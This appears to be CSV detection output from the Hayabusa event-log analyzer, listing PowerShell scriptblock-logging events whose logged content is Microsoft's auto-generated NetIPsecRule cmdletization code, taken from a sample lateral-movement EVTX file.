[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 